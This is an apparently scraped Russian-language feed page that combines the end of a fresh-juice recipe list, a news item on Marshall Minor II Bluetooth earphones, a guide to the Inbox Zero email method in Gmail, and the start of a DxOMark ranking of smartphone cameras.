Перец очистите от семечек, огурец — от кожуры, пропустите все овощи через соковыжималку. Добавьте оливковое масло, соль по вкусу, перемешайте.

9. Манговый фреш с лаймом и ананасом

фреши рецепты: Манговый фреш с лаймом и ананасом

Ингредиенты:

  • 1 манго;
  • 200 г ананаса;
  • ½ лайма.

Приготовление

Очистите фрукты, пропустите через соковыжималку, дайте соку настояться несколько минут, добавьте лёд.

Читайте также


          Marshall представила беспроводные наушники, которые держат заряд 12 часов      Cache   Translate Page      

Компания Marshall анонсировала беспроводные наушники Minor II Bluetooth. Они получили 14,5-миллиметровые излучатели и необычную конструкцию вкладышей. Сквозь каждый из них проходит соединительный провод, образующий регулируемую петлю. Она обеспечивает более плотную фиксацию в ушной раковине.

Marshall Minor II Bluetooth

На связующем кабеле расположен пульт управления с миниатюрным джойстиком, позволяющим ставить музыку на паузу, принимать звонки со смартфона и регулировать уровень громкости. Также останавливать воспроизведение можно простым сцеплением вкладышей: для этого в них имеются магниты.

Marshall Minor II Bluetooth: Джойстик

Наушники оснащены модулем Bluetooth 5.0 и поддерживают кодек Qualcomm aptX, обеспечивающий улучшение качества беспроводного звука. Встроенного аккумулятора хватит на 12 часов использования. Также есть и ускоренная подзарядка, позволяющая всего за 20 минут восполнить заряд на два часа прослушивания музыки.

Marshall Minor II Bluetooth: Три цвета

Marshall Minor II Bluetooth будут доступны в чёрном, белом и коричневом цветах по цене 129 евро.


          Метод Inbox Zero — лучший способ разобраться с тысячами непрочитанных писем      Cache   Translate Page      

Куча непрочитанных писем, постоянно болтающихся в папке «Входящие», вызовут панику у кого угодно. Если у вас много деловых партнёров и коллег, с которыми вы взаимодействуете по переписке, вам просто необходимо держать свой электронный ящик в чистоте и порядке.

Генеральный директор компании JotForm Айтекин Тэнк предлагает интересный способ организации электронной почты под названием Inbox Zero. Как следует из названия, метод заключается в том, чтобы просто держать свою папку «Входящие» пустой.

Вообще, Тэнк не изобрёл ничего нового. Inbox Zero давным-давно создал писатель и блогер Мерлин Манн, и это проверенный и широко известный метод. Примерно такую технику работы с документами описывал ещё Дэвид Аллен в своей книге «Как привести дела в порядок». Тэнк просто приспособил её для веб-интерфейса Gmail.

Я получаю и отправляю сотни писем ежедневно. Но в конце рабочего дня мой почтовый ящик неизменно пуст. У меня нет секретаря, который бы обрабатывал мою корреспонденцию. Я придерживаюсь принципа, который называется Inbox Zero. В этом нет ничего сложного.

Айтекин Тэнк, предприниматель, основатель и главный исполнительный директор JotForm

Тэнк перечисляет преимущества метода Inbox Zero:

  • Вы не пропустите важное сообщение, если ваша папка «Входящие» пуста.
  • Вы не будете заставлять своих адресатов долго ждать, потому что сможете сразу отвечать на их письма.
  • В вашем почтовом ящике не будут скапливаться сотни и тысячи непрочитанных писем.
  • Вы сэкономите больше времени на действительно важные задачи и не будете часами возиться с электронной почтой.

Я знаю многих людей, которые бережно хранят все свои письма, не удаляя ни одного. В результате их почтовый ящик начинает смахивать на ленту Twitter. Это неудобно. Вы будете постоянно теряться в письмах.

Айтекин Тэнк

Предположим, вы используете Gmail — хотя этот метод можно адаптировать к любому провайдеру (Hotmail, «Яндекс», Yahoo) или почтовому клиенту (Outlook, Thunderbird или Sylpheed). Окинем взглядом залежи непрочитанных сообщений и приступим.

1. Очистите свой почтовый ящик

Итак, взяв на вооружение метод Inbox Zero, вы должны действовать решительно. Откройте «Входящие», выделите все скопившиеся там письма и архивируйте их все разом. Кому-то это покажется сущим безумием, но Тэнк рекомендует поступить именно так.

Вам необходимо начать с пустого почтового ящика. Это руководство вам не поможет, если во «Входящих» скопились десятки тысяч писем. Так что архивируйте всё подряд, и начнём с чистого листа.

Айтекин Тэнк

2. Обрабатывайте свои письма в хронологическом порядке

Чтобы выработать эту полезную привычку, вам понадобится определённая дисциплинированность. Когда вы обрабатываете свои письма, начинайте с самого старого сообщения и продвигайтесь к свежим. Таким образом вы будете сохранять хронологический порядок и не запутаетесь.

Обрабатывать письма вам помогут две функции в Gmail:

Inbox Zero

Включите функцию «Автопереход». Для этого откройте «Настройки» → «Общие», найдите пункт «Автопереход» и активируйте его. Теперь при ответе или архивации письма Gmail не будет возвращать вас в список входящих сообщений, а отобразит следующее письмо. Таким образом вы сможете обрабатывать письма одно за другим в порядке их получения, ни на что не отвлекаясь.

Inbox Zero: как разобрать почту

Затем включите кнопку «Отправить и архивировать», если она у вас не включена. Откройте «Настройки» → «Общие» и отыщите пункт «Показывать кнопку „Отправить и архивировать“ в ответе». Так вы сэкономите время. Ведь если вы уже ответили на письмо, нет смысла хранить его во «Входящих», не так ли? Нажмите на кнопку отправки, и письмо автоматически переместится в архив.

И вот ещё важная вещь:

Не используйте электронную почту как чат. Нет ничего хуже, чем плодить длиннющие цепочки Reply из постоянно цитирующихся писем. Если вам нужно поговорить, используйте мессенджер, чат в Slack или свяжитесь по телефону. Электронная почта для этого не приспособлена.

Айтекин Тэнк

3. Ответили — архивируйте

Главное правило метода Inbox Zero: ваша папка «Входящие» — это не то место, где нужно хранить почту. Все электронные письма в почтовом ящике должны быть обработаны сразу. Читайте их одно за другим и либо отвечайте и архивируйте, если сообщение требует ответа, либо просто архивируйте, если сообщение ответа не требует.

Если вы не можете сразу ответить на какое-нибудь письмо, есть два варианта:

  • Сохраните его в вашем приложении-органайзере. Это может быть Evernote, OneNote или какой-нибудь менеджер задач. Установите дату, чтобы программа напомнила вам написать ответ в нужный момент.
  • Если вы можете сразу написать ответ, но адресат должен получить его через некоторое время, воспользуйтесь функцией отложенной доставки в Gmail. То же самое умеют Outlook, Thunderbird и другие клиенты.

4. Just do it

Всё по заветам великого и могучего Дэвида Аллена. Если письмо требует действия, которое займёт несколько минут, просто сделайте это прямо сейчас. Не копируйте письмо в список дел. Не оставляйте его в папке «Входящие».

Если вам нужно сделать платёж, просто сделайте его прямо сейчас. Если вам нужно отправить отзыв коллеге, отправьте сразу. Если дело займёт пару минут, нет смысла его откладывать.

Айтекин Тэнк

5. Используйте быстрые клавиши

Быстрые клавиши значительно сокращают время на обработку электронной почты. С ними вам не придётся водить курсором мыши туда-сюда. Тэнк рекомендует запомнить и использовать три хоткея:

  • Клавиша E позволяет быстро архивировать сообщение. Прочитали, нажали E, архивировали. Всё просто.
  • Клавиша R используется для быстрого написания ответа. Если нужно ответить на письмо, нажимаем её, вводим ответ, жмём Enter.
  • Клавиша F пересылает полученные письма другим адресатам.

Я не думаю, что вам понадобятся какие-то другие хоткеи. В Gmail я использую только три быстрые клавиши. Для всего остального есть мышь. Но перечисленные хоткеи позволяют вам быстро выполнять три самых распространённых действия с электронной почтой, так что они значительно сэкономят время.

Айтекин Тэнк

6. Настройте фильтры

Фильтры электронной почты — невероятно удобный инструмент, который делает кучу работы за вас. Достаточно настроить их один раз, и они сэкономят вам немало времени.

Если в вашем Inbox вы регулярно обнаруживаете маловажные письма (уведомления интернет-сервисов, автоматические рассылки и так далее), то либо отпишитесь от них, либо настройте фильтры, чтобы такие письма архивировались автоматически.

7. Inbox пуст — закройте почту

Когда вы пытаетесь сосредоточиться на работе, нельзя постоянно отвлекаться на электронную почту. Так что придерживаемся правила: когда папка «Входящие» пуста, закройте вкладку Gmail или почтовый клиент и забудьте о почте на ближайшие несколько часов. Просто займитесь работой.

Отключите все уведомления о входящих электронных сообщениях. Они очень отвлекают.

Вы можете снова открыть почту через несколько часов, обработать скопившиеся там сообщения, а затем опять вернуться к работе. Цель метода Inbox Zero — заставить себя не отвлекаться на входящие письма. Вы должны управлять своим почтовым ящиком, не он вами.

Айтекин Тэнк

Если вы опробовали технику Inbox Zero и готовы рассказать, что у вас получилось, или хотите предложить метод получше — напишите в комментариях.

Читайте также


          10 смартфонов с лучшими камерами по версии DxOMark      Cache   Translate Page      

1. Huawei P20 Pro

  • Оценка DxOMark — 109 баллов.
  • Тройная камера:
    • 40-мегапиксельный RGB-сенсор, объектив с диафрагмой f/1,8 и фокусным расстоянием 27 мм;
    • 20-мегапиксельный монохромный сенсор, объектив с диафрагмой f/1,6 и фокусным расстоянием 27 мм;
    • 8-мегапиксельный RGB-сенсор, телеобъектив с диафрагмой f/2,4, фокусным расстоянием 80 мм, а также оптической стабилизацией.
  • Фазовый автофокус в сенсоре на 40 Мп.
  • Режим видеосъёмки в разрешении 4К.
  • Ускоренная съёмка с частотой 960 кадров в секунду с разрешением 720p.
  • Фронтальная камера — 24 Мп.

Смартфон обладает трёхкратным оптическим и пятикратным гибридным зумами. Можно снимать с высоким ISO 102400 и в Super Slow-Mo. Есть интеллектуальная система оптической стабилизации и продвинутый автофокус.

Камеры обеспечивают чёткие снимки при любом освещении.

Начинка Huawei P20 Pro тоже не подкачала. Это полноценный флагман.

Купить

2. iPhone XS Max

  • Оценка DxOMark — 105 баллов.
  • Основной модуль — 12 Мп, шестиэлементный объектив с диафрагмой f/1,8, эквивалентное фокусное расстояние 26 мм.
  • Дополнительный модуль — 12 Мп, шестиэлементный объектив с диафрагмой f/2,4, эквивалентное фокусное расстояние 52 мм.
  • Оптическая стабилизация изображения.
  • Автоматическая фокусировка (PDAF).
  • Двойная вспышка Quad-LED.
  • Съёмка видео в 4K со скоростью 30/60 кадров в секунду, видео в 1080p со скоростью до 240 кадров в секунду.
  • Фронтальная камера — 7 Мп.

В целом характеристики камер iPhone XS Max идентичны прошлогоднему iPhone X. Однако при ближайшем рассмотрении можно обнаружить некоторые важные усовершенствования. Например, 12-мегапиксельный датчик в широкоугольном модуле со сдвоенной камерой теперь больше, чем на iPhone X (1,4 мкм против 1,22 мкм).

Впрочем, гораздо больше изменений новый iPhone получил в программном обеспечении обработки изображений. Так, при съёмке фото iPhone XS Max непрерывно захватывает многокадровый буфер при различных уровнях экспозиции, что обеспечивает нулевую задержку затвора и обработку HDR в реальном времени.

Это значит, что iPhone XS Max способен отображать HDR-изображения прямо в режиме предварительного просмотра, так что в видоискателе вы увидите снимки именно в том виде, в каком они будут сохранены. Пока что ни один из конкурентов iPhone так не умеет.

Купить

3. HTC U12+

  • Оценка DxOMark — 103 балла.
  • Основной модуль — 12 Мп, объектив с диафрагмой f/1,75.
  • Дополнительный модуль — 16 Мп, телеобъектив с диафрагмой f/2,6.
  • Обнаружение фазы и автофокусировка с лазерным управлением.
  • Оптическая стабилизация изображения.
  • Двойная светодиодная вспышка.
  • Съёмка видео в 4K со скоростью 60 кадров в секунду.
  • Фронтальная камера — двойная 8 + 8 Мп.

Флагман HTC U12+ обладает топовыми функциями обработки изображений. Смартфон поддерживает съёмку фотографий в формате RAW. Патентованная система UltraSpeed Autofocus 2 от HTC предоставляет возможность фазового детектирования и автофокусировку с лазерным управлением.

Поддерживается и режим имитации боке для искусственного размытия фона при съёмке портретов. На передней панели смартфона разместилась двухтональная светодиодная вспышка.

Купить

4. Samsung Galaxy Note 9

  • Оценка DxOMark — 103 балла.
  • Основной модуль — 12 Мп, 1/2,55-дюймовый сенсор, двухэлементный PDAF, объектив с переменной диафрагмой f/1,5–2,4.
  • Дополнительный модуль — 12 Мп, объектив f/2,4, датчик ¹⁄₃ дюйма, AF.
  • Оптическая стабилизация на обеих камерах.
  • Светодиодная вспышка.
  • Съёмка видео в 4K со скоростью 30/60 кадров в секунду.
  • Фронтальная камера — 8 Мп.

Samsung уделила немало внимания камере своего нового детища. У Note 9 сдвоенная камера: основная широкоугольная и дополнительная с телеобъективом. Оба модуля обладают оптической стабилизацией.

Основная фишка Note 9 — поддержка искусственного интеллекта для улучшения качества снимков, за что Samsung скромно именует камеру Note 9 самой интеллектуальной камерой из всех. Благодаря ИИ система может идентифицировать ключевые объекты изображения и оптимизировать параметры съёмки и обработку фотографий.

Купить

5. Huawei P20